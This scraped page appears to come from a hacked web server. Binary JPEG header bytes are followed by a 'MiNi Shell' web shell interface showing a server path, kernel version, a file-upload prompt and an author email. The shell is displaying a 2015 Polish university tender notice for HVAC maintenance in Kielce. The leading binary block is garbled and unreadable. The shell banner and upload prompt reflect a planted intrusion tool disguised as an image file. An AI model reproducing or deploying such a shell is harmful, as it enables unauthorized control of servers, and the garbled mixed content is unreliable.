JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150114/5505-N-2015.html

<p class="kh_header"><b>Kielce: Usługa polegająca na obsłudze technicznej i konserwacji urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych zamontowanych w CPiB, CJO, BU</b><br>
<b>Numer ogłoszenia: 5505 - 2015; data zamieszczenia: 14.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Jana Kochanowskiego w Kielcach , ul. Żeromskiego 5, 25-369 Kielce, woj. świętokrzyskie, tel. 41 3497277, faks 41 3497278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ujk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na obsłudze technicznej i konserwacji urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych zamontowanych w CPiB, CJO, BU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na obsłudze technicznej i konserwacji urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych zamontowanych w CPiB, CJO, BU. Szczegółowy opis dot. przedmiotu zamówienia oraz zestawienie urządzeń i ich rozmieszczenie zawierają załączniki nr 1 do SIWZ i nr 1 do formularza ofertowego Wykonawcy. Zamawiający informuje, że dopuszcza możliwość zdalnej obsługi technicznej urządzeń pod warunkiem uzyskania, na pisemny wniosek Wykonawcy, pisemnej zgody Zamawiającego na zainstalowanie niezbędnych do tego celu sprzętu i oprogramowania. W takim przypadku Wykonawca winien dokonać wizji lokalnej na danym obiekcie, w celu rozeznania możliwości takiego sposobu wykonania poszczególnych czynności obsługi technicznej (nie koniecznie wszystkich). Oprócz czynności wymienionych ww. załączniku Wykonawca zobowiązany będzie do: -pisemnego powiadamiania o konieczności wymiany lub naprawy uszkodzonych części lub urządzeń oraz o kosztach ich naprawy lub wymiany, po uzyskaniu oddzielnego zlecenia, -podejmowania wszelkich działań mających na celu obniżenie kosztów dostawy ciepła do celów c.o. i c.c.w., -w przypadku wystąpienia awarii do niezwłocznego wykonania prac zabezpieczających i poinformowania o zaistniałej awarii Inspektora Nadzoru Zamawiającego oraz do uporządkowania miejsca po awarii. Koszty usunięcia awarii będą pokrywane przez Zamawiającego na podstawie odrębnej wyceny przedstawianej każdorazowo Zamawiającemu do akceptacji. Wykonanie naprawy nastąpi nie wcześniej niż po otrzymaniu odrębnego zlecenia od Zamawiającego.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego zgodnie z art. 67 ust. 1 pkt. 6) ustawy Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.72.10.00-5, 50.73.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.01.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie przelewem wadium w kwocie: 5 000,00 zł (słownie: pięć tysięcy złotych) przed upływem terminu składania ofert zgodnie z art. 45 ust 3. Ustawy Pzp. Wykonawca, który zamierza wnieść wadium w pieniądzu powinien przelać ww. kwotę: przed upływem terminu składania ofert na konto, Zamawiającego: Uniwersytet Jana Kochanowskiego w Kielcach Raiffeisen Bank Polska S.A. Nr 92 1750 1110 0000 0000 2108 1318. Na dowodzie przelewu należy wpisać: Wadium- Znak sprawy DP/2310/8/15 Potwierdzoną za zgodność kopię dowodu dokonania przelewu wadium należy dołączyć do oferty. Wadium uważa się za wniesione w terminie, jeżeli kwota wadium znajdzie się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert. W myśl art. 63 ust. 3 pkt 1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 r. (Dz.U. z 2002 r. Nr 72 poz. 665 z póź. zm.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. W przypadku wniesienia wadium w innych formach (tj. w formie gwarancji lub poręczeń), dopuszczonych przepisami ustawy Prawo zamówień publicznych art. 45 ust. 6, należy stosowny dokument w formie oryginału dołączyć do oferty, który w swej treści musi zawierać: 1)nazwę i adres: a)dającego zlecenie tj. Wykonawcy, b)beneficjenta gwarancji tj. Zamawiającego, c)gwaranta tj. banku lub instytucji ubezpieczeniowej udzielającej gwarancji, 2)określenie wierzytelności, która ma być zabezpieczona gwarancją, 3)kwotę gwarancji, 4)termin ważności gwarancji, 5)przesłanki do zatrzymania wadium określone w art. 46 ust. 4a i ust. 5 ustawy Pzp 6)zobowiązanie gwaranta do zapłacenia bezwarunkowo, nieodwołalnie na pierwsze pisemne żądanie beneficjenta- Zamawiającego, kwoty gwarancji w przypadku spełnienia przesłanek, o których mowa powyżej (pkt. 5). Brak którejkolwiek z przesłanek zatrzymania wadium w treści gwarancji spowoduje uznanie wadium za wniesione nieprawidłowo, co będzie skutkować wykluczeniem Wykonawcy. Wnoszona gwarancja ubezpieczeniowa lub bankowa musi mieć charakter samoistny, nieodwołalny, bezwarunkowy oraz płatny na każde żądanie Zamawiającego. Oferta niezabezpieczona jedną z form wadium zostanie odrzucona zgodnie z art.24 ust.4 ustawy Pzp w związku z art. 24 ust. 2 pkt 2) ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zgodnie z zapisem art. 22 ust. 1 ustawy Pzp o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: posiadania wiedzy i doświadczenia, tj.: -wykażą się minimum jedną usługą polegającą na okresowej konserwacji instalacji grzewczych, wentylacyjnych, którą Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, o wartości nie mniejszej niż: 100 000,00 zł brutto każda usługa oraz załączą dowody potwierdzające, że ta usługa została wykonana należycie 2. Opis sposobu dokonywania oceny spełniania warunków. W celu potwierdzenia spełniania w/w warunku Wykonawca zobowiązany jest złożyć: Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług (co najmniej jedną), w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługa została wykonana (sporządzonego wg zał. Nr 4 do SIWZ), oraz załączeniem dowodów, czy usługi zostały wykonane lub są wykonywane należycie. UWAGA!! Zamawiający nie będzie oceniał zrealizowanych lub realizowanych usług o wartości poniżej wymaganej (wartości poszczególnych usług nie będą sumowane). Załączone dokumenty win-ny w sposób jednoznaczny wskazywać wykazane usługi oraz potwierdzać ich należyte wykonanie W przypadku usług realizowanych- doświadczeniem wykonawcy są usługi zrealizowane do daty składania ofert w niniejszym postępowaniu. Wykonawca podaje wartość wykonanych/zrealizowanych usług w ramach wykonywanej umowy, nie zaś łączną wartość umowy. Z treści załączonych dokumentów winno wynikać jednoznacznie, że Wykonawca spełnił w/w warunek. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia/ nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zgodnie z zapisem art. 22 ust. 1 ustawy Pzp o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: a)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.: dysponują osobą/osobami posiadającymi niezbędne kwalifikacje (potwierdzone świadectwem kwalifikacyjnym) na stanowisku Dozoru gr.D grupa 1 i 2 (minimum 1 osoba) oraz świadectwo kwalifikacyjne na stanowisku Eksploatacji grupa E 1 i 2 (minimum 2 osoby), w zakresie: -obsługi, konserwacji i remontów dla: GRUPA 1: urządzenia i instalacje elektroenergetyczne, a w tym: -urządzeń i instalacji o napięciu nie wyższym niż 1 kV, -aparatury kontrolno- pomiarowej oraz urządzeń instalacji automatycznej regulacji sterowania i zabezpieczeń urządzeń i instalacji wymienionych powyżej; -obsługi, konserwacji i remontów dla: GRUPA 2: urządzeń wytwarzających, przetwarzających, przesyłających i zużywających ciepło oraz innych urządzeń energetycznych, takich jak: -sieci i instalacje cieplne wraz z urządzeniami pomocniczymi o przesyłce ciepła powyżej 50kW -urządzenia wentylacji, klimatyzacji i chłodnicze, o mocy powyżej 50kW -pompy, wentylatory i dmuchawy o mocy powyżej 50kW -sprężarki o mocy powyżej 20kW oraz instalacje sprężonego powietrza i gazów technicznych -aparatura kontrolno- pomiarowa i urządzenia automatycznej regulacji i instalacji wymienionych powyżej. oraz dysponują minimum po 1 osobie, które posiadają: -świadectwa kwalifikacyjne w zakresie naprawy i obsługi technicznej urządzeń i instalacji chłodniczych zawierających substancje kontrolowane oraz obrotu tymi substancjami, -ukończone kursy/szkolenia z programowania automatyki budynkowej. Uwaga!!! Zamawiający dopuszcza równoważne kwalifikacje, zdobyte w innych państwach na zasadach określonych w art. 12a) ustawy z dnia 7 lica 1994 r. prawo Budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z dnia 17 kwietnia 2008 r. z późn. zm.) oraz na pod-stawie art. 20a) ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z dnia 24 stycznia 20112 r. z późn. zm.) 2. Opis sposobu dokonywania oceny spełniania warunków. W celu potwierdzenia spełniania w/w warunku Wykonawca zobowiązany jest złożyć: 1) Wykaz osób, które będą uczestniczyć w wykony?waniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług objętych niniejszym zamówieniem, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osoba?mi, sporządzonego wg zał. Nr 5 do SIWZ. 2) Oświadczenie, że osoby, które, będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia do wykonywania czynności wykazanych w wykazie osób, sporządzonego wg zał. Nr 6 do SIWZ. Z treści załączonych dokumentów, oświadczeń winno wynikać jednoznacznie, że Wykonawca spełnił w/w warunek. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia/ nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) W przypadku, gdy oferta jest podpisywana przez pełnomocnika-pełnomocnictwo. 2) Dowód wpłaty wadium. 3) Oświadczenie o pracach przeznaczonych do podwykonania (w przypadku, gdy Wykonawca będzie realizował przedmiot zamówienia z udziałem podwykonawców) (wzór oświadczenia stanowi zał. Nr 9 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - ilość konserwacji oferowanych w ciągu 12 m-cy, wliczonych w cenę usługi (wymagane przez Zamawiającego min. 2 konserwacje na 12 m-cy) - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający może wyrazić zgodę na dokonanie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy wyłącznie w sytuacji: a)ewentualnej zmiany osób uczestniczących w wykonywaniu zamówienia, z zastrzeżeniem posiadania przez te osoby, co najmniej takich samych uprawnień/kwalifikacji, co dana osoba wy-kazana na etapie składania ofert, pod rygorem niedopuszczenia tych osób do wykonywania czynności/pełnienia funkcji. b)ewentualnej zmiany podwykonawców, z zastrzeżeniem posiadania przez tych podwykonawców, co najmniej takich samych właściwości, kalifikacji, co podwykonawca wykazany w ofercie (dot. przypadku, w którym Wykonawca posługuje się potencjałem podwykonawcy). c)zmiany terminu wykonania usługi w trakcie realizacji przedmiotu zamówienia (z przyczyn, na które Wykonawca nie miał wpływu np. w przypadku klęski żywiołowej, zjawisk atmosferycznych, siły wyższej itp.). d)zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. e)ustawowej zmiany stawek podatku VAT w okresie obowiązywania umowy. f)zmiany cen w przypadku, kiedy zmiana ta będzie korzystna dla Zamawiającego tzn. na cenę niższą (na pisemny wniosek jednej ze stron), g)rezygnacji dot. konserwacji lub obsługi technicznej urządzenia ujętego w opisie przedmiotu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ujk.edu.pl/dzp/przetargi.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ w formie papierowej można uzyskać w DZP w siedzibie Zamawiającego. Wykonawca ponosi koszty ewentualnej przesyłki. SIWZ pobrana ze strony internetowej http://ujk.edu.pl, jest bezpłatna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2015 godzina 11:00, miejsce: Uniwersytet Jana Kochanowskiego w Kielcach 25-369 Kielce; ul. Żeromskiego 5, SEKRETARIAT KANCLERZA UJK pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com